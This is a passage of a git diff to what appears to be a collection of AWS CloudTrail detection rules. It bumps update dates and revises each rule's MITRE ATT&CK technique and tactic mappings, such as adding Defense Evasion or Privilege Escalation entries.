ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.004" +name = "SSH Authorized Keys" +reference = "https://attack.mitre.org/techniques/T1098/004/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/aws/lateral_movement_ec2_instance_console_login.toml b/rules/integrations/aws/lateral_movement_ec2_instance_console_login.toml index e8de6075067..6bb5af9fa5c 100644 --- a/rules/integrations/aws/lateral_movement_ec2_instance_console_login.toml +++ b/rules/integrations/aws/lateral_movement_ec2_instance_console_login.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/24" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -125,66 +125,113 @@ info where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.007" name = "Cloud Services" reference = "https://attack.mitre.org/techniques/T1021/007/" - [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" + [[rule.threat.technique.subtechnique]] id = "T1552.005" name = "Cloud Instance Metadata API" reference = "https://attack.mitre.org/techniques/T1552/005/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/lateral_movement_sns_topic_message_publish_by_rare_user.toml b/rules/integrations/aws/lateral_movement_sns_topic_message_publish_by_rare_user.toml index 2cb48308925..903ca5ff57d 100644 --- a/rules/integrations/aws/lateral_movement_sns_topic_message_publish_by_rare_user.toml +++ b/rules/integrations/aws/lateral_movement_sns_topic_message_publish_by_rare_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/07" integration = ["aws"] maturity = "production" -updated_date = "2025/09/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -140,46 +140,60 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1534" name = "Internal Spearphishing" reference = "https://attack.mitre.org/techniques/T1534/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1567" name = "Exfiltration Over Web Service" reference = "https://attack.mitre.org/techniques/T1567/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1496" name = "Resource Hijacking" reference = "https://attack.mitre.org/techniques/T1496/" + [[rule.threat.technique.subtechnique]] id = "T1496.004" name = "Cloud Service Hijacking" reference = "https://attack.mitre.org/techniques/T1496/004/" - - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [rule.new_terms] field = "new_terms_fields" value = ["cloud.account.id", "user.name", "aws.cloudtrail.resources.arn"] diff --git a/rules/integrations/aws/ml_cloudtrail_rare_method_by_city.toml b/rules/integrations/aws/ml_cloudtrail_rare_method_by_city.toml index 2634447e6ad..87d29e6c201 100644 --- a/rules/integrations/aws/ml_cloudtrail_rare_method_by_city.toml +++ b/rules/integrations/aws/ml_cloudtrail_rare_method_by_city.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/13" integration = ["aws"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 @@ -119,11 +119,24 @@ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -134,3 +147,7 @@ id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/aws/ml_cloudtrail_rare_method_by_user.toml b/rules/integrations/aws/ml_cloudtrail_rare_method_by_user.toml index db71d8487f4..161aa44c399 100644 --- a/rules/integrations/aws/ml_cloudtrail_rare_method_by_user.toml +++ b/rules/integrations/aws/ml_cloudtrail_rare_method_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/13" integration = ["aws"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -117,11 +117,6 @@ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -132,14 +127,14 @@ id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" @@ -150,9 +145,24 @@ id = "T1021.007" name = "Cloud Services" reference = "https://attack.mitre.org/techniques/T1021/007/" +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" @@ -161,13 +171,30 @@ reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1041" +name = "Exfiltration Over C2 Channel" +reference = "https://attack.mitre.org/techniques/T1041/" + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1041" -name = "Exfiltration Over C2 Channel" -reference = "https://attack.mitre.org/techniques/T1041/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/aws/persistence_aws_attempt_to_register_virtual_mfa_device.toml b/rules/integrations/aws/persistence_aws_attempt_to_register_virtual_mfa_device.toml index c81083059cd..4012b663436 100644 --- a/rules/integrations/aws/persistence_aws_attempt_to_register_virtual_mfa_device.toml +++ b/rules/integrations/aws/persistence_aws_attempt_to_register_virtual_mfa_device.toml @@ -4,7 +4,7 @@ integration = ["aws"] maturity = "production" min_stack_version = "9.2.0" min_stack_comments = "aws.cloudtrail.session_credential_from_console field introduced in AWS integration version 4.6.0" -updated_date = "2026/02/25" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -121,32 +121,41 @@ iam where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.005" name = "Device Registration" reference = "https://attack.mitre.org/techniques/T1098/005/" - [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" + [[rule.threat.technique.subtechnique]] id = "T1556.006" name = "Multi-Factor Authentication" reference = "https://attack.mitre.org/techniques/T1556/006/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_ec2_network_acl_creation.toml b/rules/integrations/aws/persistence_ec2_network_acl_creation.toml index 37786c113df..a72f180dbaf 100644 --- a/rules/integrations/aws/persistence_ec2_network_acl_creation.toml +++ b/rules/integrations/aws/persistence_ec2_network_acl_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/04" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -99,30 +99,41 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1133" name = "External Remote Services" reference = "https://attack.mitre.org/techniques/T1133/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.007" name = "Disable or Modify Cloud Firewall" reference = "https://attack.mitre.org/techniques/T1562/007/" +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" + +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/aws/persistence_ec2_route_table_modified_or_deleted.toml b/rules/integrations/aws/persistence_ec2_route_table_modified_or_deleted.toml index 3e29917bfd5..771fa38a30a 100644 --- a/rules/integrations/aws/persistence_ec2_route_table_modified_or_deleted.toml +++ b/rules/integrations/aws/persistence_ec2_route_table_modified_or_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/05" integration = ["aws"] maturity = "production" -updated_date = "2025/09/04" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] @@ -141,6 +141,23 @@ id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" + +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["cloud.account.id", "user.name"] diff --git a/rules/integrations/aws/persistence_ec2_security_group_configuration_change_detection.toml b/rules/integrations/aws/persistence_ec2_security_group_configuration_change_detection.toml index fd04f7d979e..a2105eaa9e0 100644 --- a/rules/integrations/aws/persistence_ec2_security_group_configuration_change_detection.toml +++ b/rules/integrations/aws/persistence_ec2_security_group_configuration_change_detection.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/05" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] @@ -117,25 +117,53 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.007" name = "Disable or Modify Cloud Firewall" reference = "https://attack.mitre.org/techniques/T1562/007/" +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/aws/persistence_iam_api_calls_via_user_session_token.toml b/rules/integrations/aws/persistence_iam_api_calls_via_user_session_token.toml index dde1ff0a43d..16a775ca3a9 100644 --- a/rules/integrations/aws/persistence_iam_api_calls_via_user_session_token.toml +++ b/rules/integrations/aws/persistence_iam_api_calls_via_user_session_token.toml @@ -4,7 +4,7 @@ integration = ["aws"] maturity = "production" min_stack_version = "9.2.0" min_stack_comments = "aws.cloudtrail.session_credential_from_console field introduced in AWS integration version 4.6.0" -updated_date = "2026/02/25" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -135,17 +135,34 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_iam_create_login_profile_for_root.toml b/rules/integrations/aws/persistence_iam_create_login_profile_for_root.toml index 829f6ade70b..6edad08e841 100644 --- a/rules/integrations/aws/persistence_iam_create_login_profile_for_root.toml +++ b/rules/integrations/aws/persistence_iam_create_login_profile_for_root.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/02" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -143,24 +143,28 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/integrations/aws/persistence_iam_oidc_provider_created.toml b/rules/integrations/aws/persistence_iam_oidc_provider_created.toml index 16c89c35694..456d11f2abe 100644 --- a/rules/integrations/aws/persistence_iam_oidc_provider_created.toml +++ b/rules/integrations/aws/persistence_iam_oidc_provider_created.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/05" integration = ["aws"] maturity = "production" -updated_date = "2026/02/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -120,39 +120,57 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique.subtechnique]] id = "T1484.002" name = "Trust Modification" reference = "https://attack.mitre.org/techniques/T1484/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + +[[rule.threat.technique.subtechnique]] +id = "T1484.002" +name = "Trust Modification" +reference = "https://attack.mitre.org/techniques/T1484/002/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_iam_roles_anywhere_profile_created.toml b/rules/integrations/aws/persistence_iam_roles_anywhere_profile_created.toml index cc0704696b8..3c73289d534 100644 --- a/rules/integrations/aws/persistence_iam_roles_anywhere_profile_created.toml +++ b/rules/integrations/aws/persistence_iam_roles_anywhere_profile_created.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/20" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -137,22 +137,39 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_iam_roles_anywhere_trusted_anchor_created_with_external_ca.toml b/rules/integrations/aws/persistence_iam_roles_anywhere_trusted_anchor_created_with_external_ca.toml index 61a70e9d11f..b93e5e1776c 100644 --- a/rules/integrations/aws/persistence_iam_roles_anywhere_trusted_anchor_created_with_external_ca.toml +++ b/rules/integrations/aws/persistence_iam_roles_anywhere_trusted_anchor_created_with_external_ca.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/20" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -129,22 +129,26 @@ info where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_iam_saml_provider_created.toml b/rules/integrations/aws/persistence_iam_saml_provider_created.toml index 4cf0be3208c..9116a811d46 100644 --- a/rules/integrations/aws/persistence_iam_saml_provider_created.toml +++ b/rules/integrations/aws/persistence_iam_saml_provider_created.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/05" integration = ["aws"] maturity = "production" -updated_date = "2026/02/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -116,39 +116,49 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique.subtechnique]] id = "T1484.002" name = "Trust Modification" reference = "https://attack.mitre.org/techniques/T1484/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_iam_user_created_access_keys_for_another_user.toml b/rules/integrations/aws/persistence_iam_user_created_access_keys_for_another_user.toml index 6a4dcd371c0..8c1284af2e7 100644 --- a/rules/integrations/aws/persistence_iam_user_created_access_keys_for_another_user.toml +++ b/rules/integrations/aws/persistence_iam_user_created_access_keys_for_another_user.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/13" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -158,39 +158,21 @@ from logs-aws.cloudtrail-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.001" name = "Additional Cloud Credentials" reference = "https://attack.mitre.org/techniques/T1098/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.001" -name = "Additional Cloud Credentials" -reference = "https://attack.mitre.org/techniques/T1098/001/" - - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_lambda_backdoor_invoke_function_for_any_principal.toml b/rules/integrations/aws/persistence_lambda_backdoor_invoke_function_for_any_principal.toml index 0e89738a87d..cc5eccd43a2 100644 --- a/rules/integrations/aws/persistence_lambda_backdoor_invoke_function_for_any_principal.toml +++ b/rules/integrations/aws/persistence_lambda_backdoor_invoke_function_for_any_principal.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/30" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -113,17 +113,34 @@ info where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" + +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_rds_db_instance_password_modified.toml b/rules/integrations/aws/persistence_rds_db_instance_password_modified.toml index 941d53cbad3..cf7e2c1b306 100644 --- a/rules/integrations/aws/persistence_rds_db_instance_password_modified.toml +++ b/rules/integrations/aws/persistence_rds_db_instance_password_modified.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/27" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -136,28 +136,35 @@ info where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.001" name = "Additional Cloud Credentials" reference = "https://attack.mitre.org/techniques/T1098/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" @@ -165,7 +172,6 @@ framework = "MITRE ATT&CK" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_rds_instance_made_public.toml b/rules/integrations/aws/persistence_rds_instance_made_public.toml index cac81e06dff..9ce154caeaa 100644 --- a/rules/integrations/aws/persistence_rds_instance_made_public.toml +++ b/rules/integrations/aws/persistence_rds_instance_made_public.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/29" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -144,21 +144,27 @@ any where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" + [[rule.threat.technique.subtechnique]] id = "T1556.009" name = "Conditional Access Policies" reference = "https://attack.mitre.org/techniques/T1556/009/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE 